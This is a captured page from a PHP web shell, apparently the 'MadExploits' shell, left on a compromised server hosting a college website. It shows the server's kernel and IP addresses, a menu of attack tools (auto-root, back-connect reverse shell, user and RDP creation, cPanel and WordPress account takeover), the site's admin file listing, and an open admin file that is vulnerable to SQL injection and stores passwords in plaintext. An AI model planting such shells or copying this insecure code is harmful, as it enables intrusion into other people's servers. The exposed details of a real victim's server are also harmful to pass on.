Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.105.204
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
ocassion-folder
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
product-folder
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
aboutCollege.php
3.08
KB
-rw-r--r--
adminStaff.php
1.31
KB
-rw-r--r--
docs.php
1.13
KB
-rw-r--r--
dsw.php
1.5
KB
-rw-r--r--
fPrincipal.php
1.45
KB
-rw-r--r--
footer.php
1.89
KB
-rw-r--r--
gBody.php
1.79
KB
-rw-r--r--
header.php
11.56
KB
-rw-r--r--
homeBanner.php
1.44
KB
-rw-r--r--
index.php
1.81
KB
-rw-r--r--
invoice.html
8.32
KB
-rw-r--r--
login.php
3.33
KB
-rw-r--r--
login_process.php
644
B
-rw-r--r--
logout.php
95
B
-rw-r--r--
mCommittee.php
1.55
KB
-rw-r--r--
nTeaching.php
1.96
KB
-rw-r--r--
nep-2020.php
8.17
KB
-rw-r--r--
new_transaction.php
3.64
KB
-rw-r--r--
pAndS.php
1.55
KB
-rw-r--r--
pMessage.php
2.91
KB
-rw-r--r--
proctor.php
1.61
KB
-rw-r--r--
sMessage.php
1.78
KB
-rw-r--r--
slider1.php
3.93
KB
-rw-r--r--
slider2.php
3.55
KB
-rw-r--r--
teaching.php
1.95
KB
-rw-r--r--
updatepass.php
1.52
KB
-rw-r--r--
upload_docs.php
1.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : updatepass.php
<?php include("include/db.php"); if(isset($_POST["uPass"])) { $user=$_SESSION["EMAIL"]; $pass1=$_POST["pass1"]; $res=$con->query("UPDATE `login_details` SET `password`='$pass1' WHERE email='$user' "); if($res) { echo "<script>alert('Password Updated.');</script>"; echo "<script>window.location='updatepass.php'</script>"; } } $page="change_password"; ?> <head> <script> function validDate() { var a=document.getElementById("pass1").value; var b=document.getElementById("pass2").value; if(a!=b) { alert("Both password must be same!!!"); return false; } else { a=confirm("Are you sure ?"); if(a) { } else { return false; } } } </script> </head> <body> <?php include("header.php"); ?> <div class="content-wrapper"> <div class="card"> <div class="card-body"> <div class="row m-2"> <div class="col-4 offset-4 card"> <h5 class="text-info text-center">Update Password</h5> <form method="post"> <input type="password" name="pass1" id="pass1" class="mt-4 form-control" placeholder="Enter New Password"> <br> <input type="password" name="pass2" id="pass2" class="m-1 form-control" placeholder="Confirm Password"> <br> <button type="submit" name="uPass" onclick="return validDate()" class="btn btn-info form-control mt-3 mb-3">Update</button> </form> </div> </div> </div> </div> </div> <?php include("footer.php"); ?> </body>
Close